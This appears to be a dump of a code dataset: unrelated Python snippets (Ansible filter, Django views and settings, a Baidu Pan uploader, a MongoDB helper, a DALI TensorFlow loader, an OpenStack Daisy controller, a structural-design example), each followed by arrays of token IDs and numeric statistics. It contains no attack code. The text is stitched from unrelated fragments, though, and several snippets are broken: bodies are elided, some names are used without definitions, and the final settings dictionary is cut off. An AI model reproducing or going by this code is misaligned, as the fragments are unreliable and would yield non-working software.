for i in range(int(start), int(stop) + 1):
expanded_list.append(f"{base}{i}")
return expanded_list
# No range provided or no match at all, so raise an error
raise errors.AnsibleFilterError(
f"expand_range filter error: No valid range found in '{text}'!"
)
| [
11748,
302,
198,
6738,
9093,
856,
1330,
8563,
628,
198,
4871,
25853,
26796,
25,
198,
220,
220,
220,
37227,
7469,
1127,
257,
8106,
8265,
2134,
526,
15931,
628,
220,
220,
220,
2488,
12708,
24396,
198,
220,
220,
220,
825,
16628,
33529,
1... | 2.356187 | 598 |
"""Users views."""
# Django
from django.shortcuts import get_object_or_404
# Django REST Framework
from rest_framework import mixins, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.permissions import (
AllowAny,
IsAuthenticated,
)
from rest_framework.views import APIView
# Custom permissions
from sunnysouth.marketplace.permissions.users import IsSuperUser, IsAccountOwner
# Serializers
from sunnysouth.marketplace.serializers import AssetModelSerializer, AssetSerializer
# Models
import sunnysouth.marketplace.models as attachables
| [
37811,
14490,
5009,
526,
15931,
198,
2,
37770,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
651,
62,
15252,
62,
273,
62,
26429,
198,
198,
2,
37770,
30617,
25161,
198,
6738,
1334,
62,
30604,
1330,
5022,
1040,
11,
3722,
11,
5009,
10... | 3.645349 | 172 |
#!/usr/bin/python
# coding: utf-8
# -------------------------------------------------------------------
# Author: Sudem mail@szhcloud.cn
# 写在项目最前面的话
#
# 非常感谢宝塔团队给予了我这个平台,这是我在2019年暑假结束前的最后一个作品
# 这个暑假我学习了很多,收获了很多,过的非常的充实
# 我将继续努力下去,成功一个优秀的小码农
#
# 鸣谢 github 大佬 houtianze https://github.com/houtianze/bypy
# 您的 bypy 项目给予我学习百度api 开发的机会
# 您是 baidu 网盘在linux 界面的先驱者,为了表示对您的感谢,传达 开源、互助的精神
# 本项目BDpan 在 github 开源,并使用MIT 授权,允许任何人在此基础上进行修改
#
# 感谢 运维巨巨、前端郭尧,我的好舍友强哥、鲍哥
# 好兄弟的支持是我成长的道路上最大的动力
#--------------------------------------------------------------------
import os,json,requests,base64,sys,datetime,getopt,math
import logging,warnings
logging.basicConfig(level = logging.INFO,format = '%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
warnings.filterwarnings("ignore")
#设置运行目录
os.chdir("/www/server/panel")
#添加包引用位置并引用公共包
sys.path.append("class/")
import public
# 命令行模式
if __name__ == '__main__':
RunMode = ""
FilePath = ""
FileID = ""
FileUpLoad = ""
UploadPath = ""
DownPath = ""
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "hdamup:f:s:i:")
except getopt.GetoptError:
print 'Using BDpan.py with Param \n-d [DownLoadFile] \n-a [DownLoadPath] \n-u [UploadFile] \n-p <Upload/DownLoad File Path> \n-f <Baidu Pan FileID,Used Only In DownLoad Mode> \n-s <Baidu Pan FilePath,Used Only In Upload Mode> \n-m <Move File When Upload Success>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'Using BDpan.py with Param \n-d [DownLoadFile] \n-a [DownLoadPath] \n-u [UploadFile] \n-p <Upload/DownLoad File Path> \n-f <Baidu Pan FileID,Used Only In Download Mode> \n-s <Baidu Pan FilePath,Used Only In Upload Mode> \n-m <Move File When Upload Success>'
sys.exit()
elif opt == '-d': RunMode = "DownLoad"
elif opt == '-a':RunMode = "DownLoadPath"
elif opt == '-u': RunMode = "Upload"
elif opt == '-p': FilePath = arg
elif opt == '-i': DownPath = arg
elif opt == '-f': FileID = arg
elif opt == '-s': UploadPath = arg
elif opt == "-m": FileUpLoad = "move"
BD = BDpan()
if RunMode == "DownLoad":
BD.FileDownLoad(FilePath, FileID)
elif RunMode == "DownLoadPath":
BD.PathDownload(DownPath,FilePath)
elif RunMode == "Upload":
BD.FileUpload(FilePath,UploadPath,FileUpLoad)
else:
print "UnKnow Running Mode!"
sys.exit(2)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
2,
16529,
6329,
198,
2,
6434,
25,
14818,
368,
6920,
31,
82,
23548,
17721,
13,
31522,
198,
2,
10263,
228,
247,
28839,
101,
165,
94,
117,
33566,
106,
... | 1.73152 | 1,434 |
import glob
import os
import numpy as np
import random
from create_json_data_files import *
from update_data_src import *
from create_main_gbu_page import *
from create_state_gbu_pages import *
if __name__ == "__main__":
os.system("clear")
main_menu() | [
11748,
15095,
198,
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
4738,
198,
6738,
2251,
62,
17752,
62,
7890,
62,
16624,
1330,
1635,
198,
6738,
4296,
62,
7890,
62,
10677,
1330,
1635,
220,
198,
6738,
2251,
62,
12417,
62,
... | 2.955056 | 89 |
from dotenv import dotenv_values
import os
import pymongo
from bson.objectid import ObjectId
import dateutil
import json
import sys
from utils.logging import getLogger
_logger = getLogger(__name__)
_config = dict(
dotenv_values(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", ".env")
)
)
def connect_mongo(alt_db_name=None):
"""
This method connects to MongoDB and returns a MongoDB database object
using the .env file. alt_db_name can be provided to change change the
database to a database different from the one in the .env file for testing
purposes.
Parameters:
alt_db_name (String):
this is an optional argument that will set the db_name to a value
other than the value in the .env file.
"""
try:
host, port, db_name = (
_config["MONGODB_HOST"],
int(_config["MONGODB_PORT"]),
_config["MONGODB_NAME"],
)
if alt_db_name:
db_name = alt_db_name
mongo = pymongo.MongoClient(host, port=port)
_logger.info(
f"Successfully connected to mongodb at {host}:{port} db_name: "
f"{db_name}"
)
return mongo[db_name]
except Exception as e:
_logger.error(f"Error occured {e}")
sys.exit(1)
| [
6738,
16605,
24330,
1330,
16605,
24330,
62,
27160,
198,
11748,
28686,
198,
11748,
279,
4948,
25162,
198,
6738,
275,
1559,
13,
15252,
312,
1330,
9515,
7390,
198,
11748,
3128,
22602,
198,
11748,
33918,
198,
11748,
25064,
198,
198,
6738,
338... | 2.265758 | 587 |
from random import sample
print('= PROGRAMA MEGASENA =')
n = int(input('\nQuantidade de jogos: '))
jogos = []
for i in range(n):
jogos.append([sorted(sample(range(1, 61), 6))])
print(f'Jogo {i + 1:2}:', jogos[i])
input()
| [
6738,
4738,
1330,
6291,
198,
4798,
10786,
28,
46805,
32,
337,
7156,
1921,
45510,
796,
11537,
198,
77,
796,
493,
7,
15414,
10786,
59,
77,
24915,
312,
671,
390,
48342,
418,
25,
705,
4008,
198,
198,
73,
519,
418,
796,
17635,
198,
1640,... | 2.323232 | 99 |
import asyncio
import logging
import aiosqlite
from typing import Dict, List, Optional, Tuple
from src.types.program import Program
from src.types.full_block import FullBlock
from src.types.header import HeaderData, Header
from src.types.header_block import HeaderBlock
from src.types.proof_of_space import ProofOfSpace
from src.types.sized_bytes import bytes32
from src.util.hash import std_hash
from src.util.ints import uint32, uint64
log = logging.getLogger(__name__)
| [
11748,
30351,
952,
198,
11748,
18931,
198,
11748,
257,
4267,
13976,
578,
198,
6738,
19720,
1330,
360,
713,
11,
7343,
11,
32233,
11,
309,
29291,
198,
198,
6738,
12351,
13,
19199,
13,
23065,
1330,
6118,
198,
6738,
12351,
13,
19199,
13,
... | 3.467153 | 137 |
# Copyright (c) 2017-2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import os
import glob
_tf_plugins = glob.glob(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'libdali_tf*.so'))
_dali_tf_module = None
for _libdali_tf in _tf_plugins:
try:
_dali_tf_module = tf.load_op_library(_libdali_tf)
break
# if plugin is not compatible skip it
except tf.errors.NotFoundError:
pass
else:
raise Exception('No matching DALI plugin found for installed TensorFlow version')
_dali_tf = _dali_tf_module.dali
def DALIIteratorWrapper(pipeline = None, serialized_pipeline = None, **kwargs):
"""
TF Plugin Wrapper
This operator works in the same way as DALI TensorFlow plugin, with the exception that is also accepts Pipeline objects as the input and serializes it internally. For more information, please look **TensorFlow Plugin API reference** in the documentation.
"""
if serialized_pipeline is None:
serialized_pipeline = pipeline.serialize()
return _dali_tf(serialized_pipeline=serialized_pipeline, **kwargs)
# Vanilla raw operator legacy
DALIIterator.__doc__ = DALIIteratorWrapper.__doc__
DALIRawIterator.__doc__ = _dali_tf.__doc__
| [
2,
15069,
357,
66,
8,
2177,
12,
7908,
11,
15127,
23929,
44680,
6234,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
... | 3.186813 | 546 |
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/clusters endpoint for Daisy v1 API
"""
import copy
from oslo_config import cfg
from oslo_log import log as logging
from webob.exc import HTTPBadRequest
from webob.exc import HTTPConflict
from webob.exc import HTTPForbidden
from webob.exc import HTTPNotFound
from webob import Response
from daisy.api import policy
import daisy.api.v1
from daisy.api.v1 import controller
from daisy.api.v1 import filters
from daisy.common import exception
from daisy.common import property_utils
from daisy.common import utils
from daisy.common import wsgi
from daisy import i18n
from daisy import notifier
import daisy.registry.client.v1.api as registry
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
_LI = i18n._LI
_LW = i18n._LW
SUPPORTED_PARAMS = daisy.api.v1.SUPPORTED_PARAMS
SUPPORTED_FILTERS = daisy.api.v1.SUPPORTED_FILTERS
ACTIVE_IMMUTABLE = daisy.api.v1.ACTIVE_IMMUTABLE
CONF = cfg.CONF
CONF.import_opt('disk_formats', 'daisy.common.config', group='image_format')
CONF.import_opt('container_formats', 'daisy.common.config',
group='image_format')
CONF.import_opt('image_property_quota', 'daisy.common.config')
class Controller(controller.BaseController):
"""
WSGI controller for clusters resource in Daisy v1 API
The clusters resource API is a RESTful web service for cluster data. The API
is as follows::
GET /clusters -- Returns a set of brief metadata about clusters
GET /clusters -- Returns a set of detailed metadata about
clusters
HEAD /clusters/<ID> -- Return metadata about an cluster with id <ID>
GET /clusters/<ID> -- Return cluster data for cluster with id <ID>
POST /clusters -- Store cluster data and return metadata about the
newly-stored cluster
PUT /clusters/<ID> -- Update cluster metadata and/or upload cluster
data for a previously-reserved cluster
DELETE /clusters/<ID> -- Delete the cluster with id <ID>
"""
def check_params(f):
"""
Cluster add and update operation params valid check.
:param f: Function hanle for 'cluster_add' and 'cluster_update'.
:return: f
"""
return wrapper
def _enforce(self, req, action, target=None):
"""Authorize an action against our policies"""
if target is None:
target = {}
try:
self.policy.enforce(req.context, action, target)
except exception.Forbidden:
raise HTTPForbidden()
def _get_filters(self, req):
"""
Return a dictionary of query param filters from the request
:param req: the Request object coming from the wsgi layer
:retval a dict of key/value filters
"""
query_filters = {}
for param in req.params:
if param in SUPPORTED_FILTERS:
query_filters[param] = req.params.get(param)
if not filters.validate(param, query_filters[param]):
raise HTTPBadRequest(_('Bad value passed to filter '
'%(filter)s got %(val)s')
% {'filter': param,
'val': query_filters[param]})
return query_filters
def _get_query_params(self, req):
"""
Extracts necessary query params from request.
:param req: the WSGI Request object
:retval dict of parameters that can be used by registry client
"""
params = {'filters': self._get_filters(req)}
for PARAM in SUPPORTED_PARAMS:
if PARAM in req.params:
params[PARAM] = req.params.get(PARAM)
return params
@utils.mutating
@check_params
def add_cluster(self, req, cluster_meta):
"""
Adds a new cluster to Daisy.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about cluster
:raises HTTPBadRequest if x-cluster-name is missing
"""
self._enforce(req, 'add_cluster')
cluster_name = cluster_meta["name"]
print cluster_name
print cluster_meta
cluster_meta = registry.add_cluster_metadata(req.context, cluster_meta)
return {'cluster_meta': cluster_meta}
@utils.mutating
def delete_cluster(self, req, id):
"""
Deletes a cluster from Daisy.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about cluster
:raises HTTPBadRequest if x-cluster-name is missing
"""
self._enforce(req, 'delete_cluster')
#cluster = self.get_cluster_meta_or_404(req, id)
print "delete_cluster:%s" % id
try:
registry.delete_cluster_metadata(req.context, id)
except exception.NotFound as e:
msg = (_("Failed to find cluster to delete: %s") %
utils.exception_to_str(e))
LOG.warn(msg)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = (_("Forbidden to delete cluster: %s") %
utils.exception_to_str(e))
LOG.warn(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
except exception.InUseByStore as e:
msg = (_("cluster %(id)s could not be deleted because it is in use: "
"%(exc)s") % {"id": id, "exc": utils.exception_to_str(e)})
LOG.warn(msg)
raise HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
else:
#self.notifier.info('cluster.delete', cluster)
return Response(body='', status=200)
@utils.mutating
def get_cluster(self, req, id):
"""
Returns metadata about an cluster in the HTTP headers of the
response object
:param req: The WSGI/Webob Request object
:param id: The opaque cluster identifier
:raises HTTPNotFound if cluster metadata is not available to user
"""
self._enforce(req, 'get_cluster')
cluster_meta = self.get_cluster_meta_or_404(req, id)
return {'cluster_meta': cluster_meta}
def detail(self, req):
"""
Returns detailed information for all available clusters
:param req: The WSGI/Webob Request object
:retval The response body is a mapping of the following form::
{'clusters': [
{'id': <ID>,
'name': <NAME>,
'nodes': <NODES>,
'networks': <NETWORKS>,
'description': <DESCRIPTION>,
'created_at': <TIMESTAMP>,
'updated_at': <TIMESTAMP>,
'deleted_at': <TIMESTAMP>|<NONE>,}, ...
]}
"""
self._enforce(req, 'get_clusters')
params = self._get_query_params(req)
try:
clusters = registry.get_clusters_detail(req.context, **params)
except exception.Invalid as e:
raise HTTPBadRequest(explanation=e.msg, request=req)
return dict(clusters=clusters)
@utils.mutating
@check_params
def update_cluster(self, req, id, cluster_meta):
"""
Updates an existing cluster with the registry.
:param request: The WSGI/Webob Request object
:param id: The opaque cluster identifier
:retval Returns the updated cluster information as a mapping
"""
self._enforce(req, 'update_cluster')
if cluster_meta.has_key('nodes'):
orig_keys = list(eval(cluster_meta['nodes']))
for host_id in orig_keys:
self._raise_404_if_host_deleted(req, host_id)
if cluster_meta.has_key('networks'):
orig_keys = list(eval(cluster_meta['networks']))
for network_id in orig_keys:
self._raise_404_if_network_deleted(req, network_id)
orig_cluster_meta = self.get_cluster_meta_or_404(req, id)
# Do not allow any updates on a deleted cluster.
# Fix for LP Bug #1060930
if orig_cluster_meta['deleted']:
msg = _("Forbidden to update deleted cluster.")
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
try:
cluster_meta = registry.update_cluster_metadata(req.context,
id,
cluster_meta)
except exception.Invalid as e:
msg = (_("Failed to update cluster metadata. Got error: %s") %
utils.exception_to_str(e))
LOG.warn(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
except exception.NotFound as e:
msg = (_("Failed to find cluster to update: %s") %
utils.exception_to_str(e))
LOG.warn(msg)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = (_("Forbidden to update cluster: %s") %
utils.exception_to_str(e))
LOG.warn(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
except (exception.Conflict, exception.Duplicate) as e:
LOG.warn(utils.exception_to_str(e))
raise HTTPConflict(body=_('Cluster operation conflicts'),
request=req,
content_type='text/plain')
else:
self.notifier.info('cluster.update', cluster_meta)
return {'cluster_meta': cluster_meta}
class ProjectDeserializer(wsgi.JSONRequestDeserializer):
"""Handles deserialization of specific controller method requests."""
class ProjectSerializer(wsgi.JSONResponseSerializer):
"""Handles serialization of specific controller method responses."""
def create_resource():
"""Projects resource factory method"""
deserializer = ProjectDeserializer()
serializer = ProjectSerializer()
return wsgi.Resource(Controller(), deserializer, serializer)
| [
2,
15069,
2211,
4946,
25896,
5693,
198,
2,
1439,
6923,
33876,
13,
198,
2,
198,
2,
220,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
345,
743,
198,
2,
220,
220,
220,
407,
779,
428,
... | 2.186828 | 5,208 |
#
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from transformers import TFTrainingArguments, TrainingArguments
from transformers4rec.config import trainer
| [
2,
198,
2,
15069,
357,
66,
8,
33448,
11,
15127,
23929,
44680,
6234,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
... | 3.805405 | 185 |
from ._tomlib import STree
from ._tomlib import Node, EdgeNode, PathNode, Position, MultiPosition, PositionRelevance
from ._tomlib import DFSIterator, PrefixIterator, PostfixIterator
from ._tomlib import COLOR, INDEX, INTERNAL, ROOT, VALID
| [
6738,
47540,
39532,
8019,
1330,
3563,
631,
198,
6738,
47540,
39532,
8019,
1330,
19081,
11,
13113,
19667,
11,
10644,
19667,
11,
23158,
11,
15237,
26545,
11,
23158,
3041,
2768,
590,
198,
6738,
47540,
39532,
8019,
1330,
360,
10652,
37787,
11... | 3.478261 | 69 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ssd1306.py
# @Author : (Zack Huang)
# @Link :
# @Date : 12/16/2021, 11:22:36 AM
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from datetime import datetime
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
264,
21282,
12952,
21,
13,
9078,
198,
2,
2488,
13838,
1058,
220,
357,
57,
441,
31663,
8,
198,
2,
2488,
... | 2.431193 | 109 |
# Library of nonlinear dynamical systems
# Usage: Every discrete xKF class inherits from NLDS.
# There are two ways to use this library in the discrete case:
# 1) Explicitly initialize a discrete NLDS object with the desired parameters,
# then pass it onto the xKF class of your choice.
# 2) Initialize the xKF object with the desired NLDS parameters using
# the .from_base constructor.
# Way 1 is preferable whenever you want to use the same NLDS for multiple
# filtering processes. Way 2 is preferred whenever you want to use a single NLDS
# for a single filtering process
# Author: Gerardo Durán-Martín (@gerdm)
import jax
from jax.random import split, multivariate_normal
import chex
from dataclasses import dataclass
from typing import Callable
@dataclass
class NLDS:
"""
Base class for the nonlinear dynamical systems' module
Parameters
----------
fz: function
Nonlinear state transition function
fx: function
Nonlinear observation function
Q: array(state_size, state_size) or function
Nonlinear state transition noise covariance function
R: array(obs_size, obs_size) or function
Nonlinear observation noise covariance function
"""
fz: Callable
fx: Callable
Q: chex.Array
R: chex.Array
alpha: float = 0.
beta: float = 0.
kappa: float = 0.
d: int = 0
def sample(self, key, x0, nsteps, obs=None):
"""
Sample discrete elements of a nonlinear system
Parameters
----------
key: jax.random.PRNGKey
x0: array(state_size)
Initial state of simulation
nsteps: int
Total number of steps to sample from the system
obs: None, tuple of arrays
Observed values to pass to fx and R
Returns
-------
* array(nsamples, state_size)
State-space values
* array(nsamples, obs_size)
Observed-space values
"""
obs = () if obs is None else obs
state_t = x0.copy()
obs_t = self.fx(state_t)
self.state_size, *_ = state_t.shape
self.obs_t, *_ = obs_t.shape
init_state = (key, state_t)
_, hist = jax.lax.scan(self.__sample_step, init_state, obs, length=nsteps)
return hist
| [
2,
10074,
286,
1729,
29127,
6382,
605,
3341,
198,
2,
29566,
25,
3887,
28810,
2124,
42,
37,
1398,
10639,
896,
422,
22879,
5258,
13,
198,
2,
1318,
389,
734,
2842,
284,
779,
428,
5888,
287,
262,
28810,
1339,
25,
198,
2,
352,
8,
11884... | 2.604308 | 882 |
from compas_cem.diagrams import TopologyDiagram
from compas_cem.elements import Node
from compas_cem.elements import TrailEdge
from compas_cem.elements import DeviationEdge
from compas_cem.loads import NodeLoad
from compas_cem.supports import NodeSupport
from compas_cem.equilibrium import static_equilibrium
from compas_cem.plotters import TopologyPlotter
from compas_cem.plotters import FormPlotter
# ------------------------------------------------------------------------------
# Data
#-------------------------------------------------------------------------------
points = [(0, [0.0, 0.0, 0.0]),
(1, [0.0, 1.0, 0.0]),
(2, [0.0, 2.0, 0.0]),
(3, [1.0, 0.0, 0.0]),
(4, [1.0, 1.0, 0.0]),
(5, [1.0, 2.0, 0.0])]
trail_edges = [(0, 1),
(1, 2),
(3, 4),
(4, 5)]
deviation_edges = [(1, 4),
(2, 5)]
# ------------------------------------------------------------------------------
# Topology Diagram
# ------------------------------------------------------------------------------
topology = TopologyDiagram()
# ------------------------------------------------------------------------------
# Add Nodes
# ------------------------------------------------------------------------------
for key, point in points:
topology.add_node(Node(key, point))
# ------------------------------------------------------------------------------
# Add Trail Edges
# ------------------------------------------------------------------------------
for u, v in trail_edges:
topology.add_edge(TrailEdge(u, v, length=-1.0))
# ------------------------------------------------------------------------------
# Add Deviation Edges
# ------------------------------------------------------------------------------
for u, v in deviation_edges:
topology.add_edge(DeviationEdge(u, v, force=-1.0))
# ------------------------------------------------------------------------------
# Add Indirect Deviation Edges
# ------------------------------------------------------------------------------
topology.add_edge(DeviationEdge(1, 5, force=1.0))
topology.add_edge(DeviationEdge(1, 3, force=1.0))
topology.add_edge(DeviationEdge(2, 4, force=1.0))
# ------------------------------------------------------------------------------
# Set Supports Nodes
# ------------------------------------------------------------------------------
topology.add_support(NodeSupport(0))
topology.add_support(NodeSupport(3))
# ------------------------------------------------------------------------------
# Add Loads
# ------------------------------------------------------------------------------
load = [0.0, -1.0, 0.0]
topology.add_load(NodeLoad(2, load))
topology.add_load(NodeLoad(5, load))
# ------------------------------------------------------------------------------
# Collect Trails and Edge lines
# ------------------------------------------------------------------------------
edge_lines = [topology.edge_coordinates(*edge) for edge in topology.edges()]
# ------------------------------------------------------------------------------
# Equilibrium of forces
# ------------------------------------------------------------------------------
topology.build_trails()
form = static_equilibrium(topology, eta=1e-6, tmax=100, verbose=True)
for node in form.support_nodes():
print(node, form.reaction_force(node))
# ------------------------------------------------------------------------------
# Topology Plotter
# ------------------------------------------------------------------------------
plotter = TopologyPlotter(topology, figsize=(16, 9))
plotter.draw_loads(radius=0.025, draw_arrows=True, scale=0.5, gap=-0.55)
plotter.draw_nodes(radius=0.025)
plotter.draw_edges()
plotter.show()
# ------------------------------------------------------------------------------
# Form Plotter
# ------------------------------------------------------------------------------
plotter = FormPlotter(form, figsize=(16, 9))
plotter.draw_nodes(radius=0.025, text="key")
plotter.draw_edges(text="force")
plotter.draw_loads(scale=0.5, gap=-0.55)
plotter.draw_reactions(scale=0.25)
plotter.draw_segments(edge_lines)
plotter.show()
| [
6738,
552,
292,
62,
344,
76,
13,
10989,
6713,
82,
1330,
5849,
1435,
18683,
6713,
198,
198,
6738,
552,
292,
62,
344,
76,
13,
68,
3639,
1330,
19081,
198,
6738,
552,
292,
62,
344,
76,
13,
68,
3639,
1330,
13069,
37021,
198,
6738,
552,... | 3.815552 | 1,106 |
import base64
import json
import urllib.request
import logging
logger = logging.getLogger(__name__)
| [
11748,
2779,
2414,
198,
11748,
33918,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
18931,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628
] | 3.1875 | 32 |
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
import os
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
26791,
1330,
640,
11340,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
27530,
1330,
11787,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
9575,
198,
11748,
28... | 3.547619 | 42 |
from numpy import *
from matplotlib.pyplot import *
from WaveBlocks.Plot import plotcf
a = linspace(0,2*pi,6000)
y = exp(1.0j*a)
fig = figure()
ax = fig.gca()
plotcf(a, angle(y), abs(y))
ax.plot(a, real(y), "b-", label=r"$\Re y$")
ax.plot(a, imag(y), "g-", label=r"$\Im y$")
ax.plot(a, angle(y), "c-", label=r"$\arg y$")
ax.set_xlim(0,2*pi)
ax.set_xticks((0,
pi/4,
pi/2,
3*pi/4,
pi,
5*pi/4,
3*pi/2,
7*pi/4,
2*pi))
ax.set_xticklabels((r"$0$",
r"$\frac{\pi}{4}$",
r"$\frac{\pi}{2}$",
r"$\frac{3\pi}{4}$",
r"$\pi$",
r"$\frac{5\pi}{4}$",
r"$\frac{3\pi}{2}$",
r"$\frac{7\pi}{4}$",
r"$2\pi$"))
ax.set_yticks((-pi,
-1,
0,
1,
pi))
ax.set_yticklabels((r"$-\pi$",
r"$-1$",
r"$0$",
r"$1$",
r"$\pi$"))
ax.grid(True)
fig.savefig("color_legend.png")
close(fig)
| [
6738,
299,
32152,
1330,
1635,
198,
6738,
2603,
29487,
8019,
13,
9078,
29487,
1330,
1635,
198,
6738,
17084,
45356,
13,
43328,
1330,
7110,
12993,
198,
198,
64,
796,
300,
1040,
10223,
7,
15,
11,
17,
9,
14415,
11,
43434,
8,
198,
88,
796... | 1.390791 | 847 |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from countDefense import getDefenseTime
from countSkill import getSkillTime
import warnings
warnings.filterwarnings("ignore")
# In[2]: | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
220,
198,
11748,
299,
32152,
355,
45941,
198,
6738... | 3.181818 | 77 |
"""
Django settings for votechain project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from datetime import timedelta
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.getenv("DEBUG", "False") == "True"
TEST = os.getenv("TEST", "False") == "True"
INTEGRATE_BLOCKCHAIN = os.getenv("INTEGRATE_BLOCKCHAIN", "False") == "True"
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("PRIVATE_KEY", None)
if SECRET_KEY is None:
if DEBUG:
print("WARNING: Private key is missing")
else:
raise EnvironmentError("Private key is missing")
ALLOWED_HOSTS = ['*']
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 2592000 # 30 days, I used ASP.NET default value
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'drf_yasg',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
]
ROOT_URLCONF = 'votechain.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'votechain.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'HOST': os.environ.get('DATABASE_HOST', 'localhost'),
'PORT': os.environ.get('DATABASE_PORT', '2866'),
'USER': "root" if TEST else os.environ.get('DATABASE_USER', 'sa'),
'PASSWORD': os.environ.get('DATABASE_PASSWORD', None),
'NAME': 'Votechain',
'AUTOCOMMIT': True,
'TEST': {
'NAME': 'test_Votechain',
},
}
}
FIXTURE_DIRS = [ './core/fixtures' ]
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication'
],
'DATE_INPUT_FORMATS': [
'%d-%m-%Y'
],
'DATETIME_INPUT_FORMATS': [
'%d-%m-%Y %H:%M:%S'
],
'DATE_FORMAT': '%d-%m-%Y',
'DATETIME_FORMAT': '%d-%m-%Y %H:%M:%S',
'DEFAULT_THROTTLE_CLASSES': [
